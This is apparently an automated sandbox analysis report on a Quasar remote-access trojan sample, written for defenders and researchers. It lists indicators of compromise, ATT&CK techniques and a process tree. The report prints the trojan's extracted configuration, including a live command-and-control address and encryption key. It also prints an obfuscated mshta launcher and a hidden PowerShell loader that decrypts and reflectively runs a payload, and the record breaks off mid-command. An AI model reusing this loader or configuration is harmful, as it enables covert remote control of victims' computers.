quasar | 6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa

Analysis

max time kernel
60s
max time network
55s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
18-08-2024 13:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Release/Handlers/Handler.bat
Size

12.7MB
MD5

e154d92aa7ecd7728940f32bb2c82cc6
SHA1

b004e191ae993b3deab2d77c6f99c64e5de55672
SHA256

37be53a96145cd6ad7557e95d85a256377af9d9e126538a4733ebde178254cc5
SHA512

b8b822fc4d8295a59700b7750fff7841f56ed877207e622dd7d7b0435ce737f212d5f754c95f2329b87e83c1ae796b07724276473256d8787f0f87b1871121e4
SSDEEP

49152:Fh5PUtdFBcAJU7Ygqef4u6NE6BGzp3OtWxgusC7QG5r0Wn9O3oGpWJtPS1P8keqj:4

Score

10^/10

quasar v2.2.5 | vanillarat defense_evasion discovery spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | VanillaRAT

163.5.215.216:4782

Mutex

cbadd9b5-ddec-4242-bf61-1d311f862dd3

Attributes

encryption_key
1C7D50D49C8CFBD67416B7A7C9CD3F45FD94217E
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral4/memory/2656-68-0x000001606F720000-0x000001606FEEA000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 5276 created 2804 5276 WerFault.exe dllhost.exe
PID 1308 created 6060 1308 WerFault.exe dllhost.exe

description	pid	process	target process
PID 5276 created 2804	5276	WerFault.exe	dllhost.exe
PID 1308 created 6060	1308	WerFault.exe	dllhost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

Handler.bat.exe$sxr-powershell.exesvchost.exe

description	pid	process	target process
PID 552 created 648	552	Handler.bat.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 552 created 648	552	Handler.bat.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 2656 created 648	2656	$sxr-powershell.exe	winlogon.exe
PID 5236 created 2504	5236	svchost.exe	dllhost.exe
PID 5236 created 2804	5236	svchost.exe	dllhost.exe
PID 5236 created 6060	5236	svchost.exe	dllhost.exe

Deletes itself 1 IoCs

Processes:

Handler.bat.exe

pid process

552 Handler.bat.exe
Executes dropped EXE 5 IoCs

Processes:

Handler.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

552 Handler.bat.exe
4980 $sxr-mshta.exe
2480 $sxr-cmd.exe
2656 $sxr-powershell.exe
3204 $sxr-powershell.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe

Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
defense_evasion

Hidden Window
T1564.003

Processes:

$sxr-powershell.exe$sxr-powershell.exe

pid process

2656 $sxr-powershell.exe
3204 $sxr-powershell.exe

pid	process
2656	$sxr-powershell.exe
3204	$sxr-powershell.exe

Suspicious use of SetThreadContext 18 IoCs

Processes:

Handler.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 552 set thread context of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 set thread context of 1996	552	Handler.bat.exe	dllhost.exe
PID 2656 set thread context of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 2072	2656	$sxr-powershell.exe	dllhost.exe
PID 552 set thread context of 3772	552	Handler.bat.exe	dllhost.exe
PID 552 set thread context of 4984	552	Handler.bat.exe	dllhost.exe
PID 2656 set thread context of 5712	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 5964	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 6100	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 5420	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 1796	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 5156	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 5220	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 2504	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 2804	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 set thread context of 6060	2656	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 6 IoCs

Processes:

Handler.bat.exe

description	ioc	process
File opened for modification	C:\Windows\$sxr-cmd.exe	Handler.bat.exe
File created	C:\Windows\$sxr-powershell.exe	Handler.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Handler.bat.exe
File created	C:\Windows\$sxr-mshta.exe	Handler.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Handler.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Handler.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6104 2504 WerFault.exe dllhost.exe
5844 6060 WerFault.exe dllhost.exe

pid	pid_target	process	target process
6104	2504	WerFault.exe	dllhost.exe
5844	6060	WerFault.exe	dllhost.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WerFault.exedllhost.exedllhost.exedllhost.exedllhost.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WerFault.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

5328 cmd.exe
5696 PING.EXE

pid	process
5328	cmd.exe
5696	PING.EXE

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4648 taskkill.exe
Modifies registry class 1 IoCs

Processes:

$sxr-mshta.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5696 PING.EXE

pid	process
4648	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

pid	process
5696	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Handler.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe

pid	process
552	Handler.bat.exe
552	Handler.bat.exe
552	Handler.bat.exe
4672	dllhost.exe
4672	dllhost.exe
4672	dllhost.exe
4672	dllhost.exe
1996	dllhost.exe
1996	dllhost.exe
1996	dllhost.exe
1996	dllhost.exe
552	Handler.bat.exe
552	Handler.bat.exe
2656	$sxr-powershell.exe
2656	$sxr-powershell.exe
2656	$sxr-powershell.exe
2656	$sxr-powershell.exe
3600	dllhost.exe
3600	dllhost.exe
3600	dllhost.exe
3600	dllhost.exe
2992	dllhost.exe
2992	dllhost.exe
2992	dllhost.exe
2992	dllhost.exe
2656	$sxr-powershell.exe
2656	$sxr-powershell.exe
3204	$sxr-powershell.exe
3204	$sxr-powershell.exe
2656	$sxr-powershell.exe
1528	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
3204	$sxr-powershell.exe
3204	$sxr-powershell.exe
2072	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe
2072	dllhost.exe
2072	dllhost.exe
1528	dllhost.exe
1528	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Handler.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	552	Handler.bat.exe
Token: SeDebugPrivilege	552	Handler.bat.exe
Token: SeDebugPrivilege	4672	dllhost.exe
Token: SeDebugPrivilege	1996	dllhost.exe
Token: SeDebugPrivilege	2656	$sxr-powershell.exe
Token: SeDebugPrivilege	2656	$sxr-powershell.exe
Token: SeDebugPrivilege	3600	dllhost.exe
Token: SeDebugPrivilege	2992	dllhost.exe
Token: SeDebugPrivilege	3204	$sxr-powershell.exe
Token: SeDebugPrivilege	2656	$sxr-powershell.exe
Token: SeDebugPrivilege	1528	dllhost.exe
Token: SeDebugPrivilege	2072	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-powershell.exe

pid process

2656 $sxr-powershell.exe

pid	process
2656	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeHandler.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedllhost.exe

description	pid	process	target process
PID 5008 wrote to memory of 552	5008	cmd.exe	Handler.bat.exe
PID 5008 wrote to memory of 552	5008	cmd.exe	Handler.bat.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 4672	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 552 wrote to memory of 1996	552	Handler.bat.exe	dllhost.exe
PID 4980 wrote to memory of 2480	4980	$sxr-mshta.exe	$sxr-cmd.exe
PID 4980 wrote to memory of 2480	4980	$sxr-mshta.exe	$sxr-cmd.exe
PID 2480 wrote to memory of 2656	2480	$sxr-cmd.exe	$sxr-powershell.exe
PID 2480 wrote to memory of 2656	2480	$sxr-cmd.exe	$sxr-powershell.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3600	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 2992	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 3204	2656	$sxr-powershell.exe	$sxr-powershell.exe
PID 2656 wrote to memory of 3204	2656	$sxr-powershell.exe	$sxr-powershell.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 2656 wrote to memory of 1528	2656	$sxr-powershell.exe	dllhost.exe
PID 1528 wrote to memory of 648	1528	dllhost.exe	winlogon.exe
PID 1528 wrote to memory of 704	1528	dllhost.exe	lsass.exe
PID 1528 wrote to memory of 1012	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 448	1528	dllhost.exe	dwm.exe
PID 1528 wrote to memory of 780	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 628	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1084	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1092	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1200	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1224	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1272	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1316	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1436	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1488	1528	dllhost.exe	svchost.exe
PID 1528 wrote to memory of 1512	1528	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5836 attrib.exe

pid	process
5836	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:648
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:448
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{60413543-b28d-43e9-94ce-14cde01c7a56}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4672
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ecd70d80-c62e-4226-bc55-de9460e27172}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{da4eb554-3736-4161-9cfe-54b4c4bbe8d1}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1528
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f405f003-1c50-4b0a-b5bb-3e75beac0cbc}
  2⤵
  PID:3772
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2468371f-4996-4a2c-89cc-83db20afff50}
  2⤵
  PID:5712
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{40b72183-8e7a-49d9-9e75-c966d0c547ce}
  2⤵
  PID:6100
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f62e8cdb-b511-4d32-b1e4-fe6d21f7f6b0}
  2⤵
  PID:1796
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{50abcaee-ecb8-4880-853f-06694794bbaa}
  2⤵
  PID:5220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c8bd73d1-5a15-4f0d-b38a-f24da5bfc179}
  2⤵
  PID:2804
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2804 -s 308
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5820

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1084

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1200
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1172
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, 